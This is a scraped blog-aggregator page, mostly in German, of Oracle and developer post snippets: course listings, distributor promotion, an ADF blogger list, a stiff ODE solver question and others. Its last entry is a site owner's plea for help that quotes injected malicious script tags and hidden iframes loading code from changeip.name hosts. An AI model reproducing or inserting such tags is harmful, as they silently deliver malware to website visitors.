    In der letzten Woche wurden von Oracle University folgende neue Kurse (bzw. Versionen davon) veröffentlicht: Database RAC & Grid Infrastructure for Oracle Solaris System Administration (1 day) Oracle Database 11g: Performance Tuning (Training On Demand) Development Tools Oracle Database: Program with PL/SQL (Training On Demand) MySQL MySQL for Database Administrators (Training On Demand) Fusion Middleware Oracle WebCenter Portal 11g: Build Portals With Spaces (3 days) Oracle WebCenter Content 11g: Site Studio Essentials (5 days) Oracle BPM 11g Modeling (3 days) Business Intelligence & Datawarehousing Oracle BI Applications 7.9.6: Implementation for Oracle EBS (4 days) Oracle BI Applications 7.9.6: Implementation for Siebel CRM (4 days) Oracle BI 11g R1: Build Repositories (Training on Demand) Fusion Applications Fusion Applications: Extend Applications with ADF (5 days) E-Business Suite R12.x Extend Oracle Applications: Building OA Framework Applications (Training On Demand) PeopleSoft PeopleSoft Integration Tools Rel 8.50 (Training On Demand) Wenn Sie weitere Einzelheiten erfahren oder sich über Kurstermine informieren möchten, wenden Sie sich einfach an Ihr lokales Oracle University-Team in.

    Read the article

  • Arrow ECS: VAD mit Weitblick

    - by A&C Redaktion
    Die Arrow ECS unterstützt Oracle Partner dabei, sich dauerhaft erfolgreich zu etablieren. Als Value Added Distributor, kurz VAD, für das Oracle Soft- und Hardware Portfolio bietet Arrow wertvolle Mehrwertdienstleistungen für Partner an, etwa in den Bereichen Consulting, Vertrieb und Produktmarketing. Der Vorteil: Die Partner können sich voll auf ihr Kerngeschäft konzentrieren. Wie die Zusammenarbeit genau funktioniert, erklären Martin Wilhelm, Manager Business Unit Enterprise Solutions, Herbert Varga vom Product Management und die Sales-Expertin für Oracle Produkte, Maria Keller, im Video. Arrow ECS steht für kompetente und zuverlässige Zusammenarbeit mit dem Partner und wurde bereits mehrfach zum Oracle Global Value Added Distributor des Jahres gekürt

    Read the article

  • Arrow ECS: VAD mit Weitblick

    - by A&C Redaktion
    Die Arrow ECS unterstützt Oracle Partner dabei, sich dauerhaft erfolgreich zu etablieren. Als Value Added Distributor, kurz VAD, für das Oracle Soft- und Hardware Portfolio bietet Arrow wertvolle Mehrwertdienstleistungen für Partner an, etwa in den Bereichen Consulting, Vertrieb und Produktmarketing. Der Vorteil: Die Partner können sich voll auf ihr Kerngeschäft konzentrieren. Wie die Zusammenarbeit genau funktioniert, erklären Martin Wilhelm, Manager Business Unit Enterprise Solutions, Herbert Varga vom Product Management und die Sales-Expertin für Oracle Produkte, Maria Keller, im Video. Arrow ECS steht für kompetente und zuverlässige Zusammenarbeit mit dem Partner und wurde bereits mehrfach zum Oracle Global Value Added Distributor des Jahres gekürt

    Read the article

  • Tipp -> Gutes Kurzvideo zu Real Application Cluster - Active Data Guard - Hochverfügbarkeit

    - by britta wolf
    In diesem 7 minütigen Video wird das Thema Hochverfügbarkeit mit Oracle Real Application Cluster (RAC) und Active Data Guard kurz und knackig erklärt. Das Video wurde von unseren Potsdamer-Kollegen aus dem DTCC erstellt. Reinschauen lohnt sich! Wir werden von Zeit zu Zeit weitere Kurzvideos auf unseren Academy-Blog stellen Wofür steht eigentlich die Abkürzung DTCC? Oracle Direct Technology Customer Center Eine Abteilung mit Systemberatern in Potsdam. Unsere Kollegen betreuen Kunden rund um Oracle-Lösungen aus dem Bereich Datenbank und Middleware. Die aktuellen Herausforderungen werden gemeinsam mit Kunden analysiert und eine ideale Lösung sowie eine Roadmap dorthin entwickelt. Hierbei geht es sowohl um Erläuterungen zu Features und Funktionen, als auch um IT-Architektur und letztendlich um den optimalen Einsatz der Oracle-Lösungen.

    Read the article

  • Even More New ADF Bloggers

    - by Shay Shmeltzer
    A couple of weeks back I posted an entry about new ADF related blogs that I found out about. Well as they say "when it rain it pours"  - and over the past few days I came across several other new bloggers that cover ADF. So here are a few others that you might want to add to your ADF blog aggregator: http://adfplus.blogspot.com - Paco van der Lindenhttps://blogs.oracle.com/aramamoo/ - Arunhttp://e20labs.org - Chad Thompsonhttp://oracleadfhowto.blogspot.com/ - Vinay Agarwalhttp://javaosdev.blogspot.com - Donovan Sherriffs https://blogs.oracle.com/prajkumar - Phil Wanghttp://oracle-itself.tumblr.com - Wael Abdeenhttps://blogs.oracle.com/adfthoughts - Raphael Rodriguehttp://adfwithejb.blogspot.com - Prateek Kumar shaw And here are a few more that are not just about ADF but do have the occasional ADF related entry:http://yonaweb.be - Yannick Ongenahttp://blog.whitehorses.nl - whitehorseshttps://blogs.oracle.com/imc - ISV Migration Center Team and the usual reminder here: To keep track of all things new in the ADF blog world follow the JDeveloper twitter or like JDeveloper on facebook to get notified of the latest entries we find for you around the world.

    Read the article

  • [News] Validation des d?pendances inter-couches

    Visual Studio 2010 propose une fonctionnalit? r?ellement pertinente, notamment lorsqu'on r?alise de l'audit de code. La validation des couches d'architecture permet de d?celer des probl?mes de d?pendances invalides entre les couches d'une architecture. Ceci peut arriver lorsque la couche de pr?sentation court-circuite la couche de services pour acc?der ? des DAO. Coupl? avec TFS, il est m?me possible d'interdire le commit d'une d?pendance invalide. A d?couvrir absolument.

    Read the article

  • Cloud Control 12c: Verteilen von beliebiger Software mit Deployment Prozeduren

    - by Ralf Durben (DBA Community)
    Mit dem Lifecycle Management Pack von Oracle Enterprise Manager Cloud Control 12c können Sie Software aus der grafischen Konsole heraus auf Zielsysteme verteilen und installieren, also provisionieren. Dieses funktioniert für viele Oracle Produkte in einer vorgefertigen Form unter Verwendung von Deployment Prozeduren, die als eine Art Spezialformat für Provisionierungsskripte angesehen werden können. Dabei können die vorgefertigten Deployment Prozeduren direkt oder für die eigenen Bedürfnisse modifiziert verwendet werden. Sie können diese Technik jedoch auch für die Provisionierung beliebiger Software nutzen, indem Sie eigene Deployment Prozeduren erstellen. Als einfaches Beispiel einer solchen Provisionierung soll in diesem Tipp das Verteilen einer ZIP-Datei mit anschliessendem Auspacken betrachtet werden. Bewusst wird in diesem Tipp versucht, das Beispiel einfach zu halten, um einen leichten Einstieg zu ermöglichen. Dieser Tipp zeigt Ihnen, wie Sie eine ZIP-Datei mit einer selbstgeschriebenen Deployment Prozedur provisionieren können.

    Read the article

  • Large sparse (stiff) ODE system needed for testing

    - by macydanim
    I hope this is the right place for this question. I have been working on a sparse stiff implicit ODE solver and have finished the code so far. I now tested the solver with the Van der Pol equation, and another stiff problem, which is of dimension 4. But to perform better tests I am searching for a bigger system. I'm thinking of the order N = 100...1000, if possible stiff and sparse. Does anybody have an example I could use? I really don't know where to search.

    Read the article

  • How to remove this malware

    - by muratto12
    Some files in my site contains some extra lines. After I've deleted them manually, I find them corrupted again some time later. it is all coming from http://*.changeip.name/ some js files. How can I remove them? <!--pizda--><script type='text/javascript' src='http://m2.changeip.name/validate.js?ftpid=15035'></script><!--/pizda--> <iframe src=http://pizda.changeip.name/?f=1065433 framebor der=0 marginheight=0 marginwidth=0 scrolling=0 width=5 heigh t=5 border=0> <iframe src=http://kuku.changeip.name/?f=1065433 framebord er=0 marginheight=0 marginwidth=0 scrolling=0 width=5 height =5 border=0>

    Read the article

< Previous Page | 14 15 16 17 18 19 20 21 22 23 24 25  | Next Page >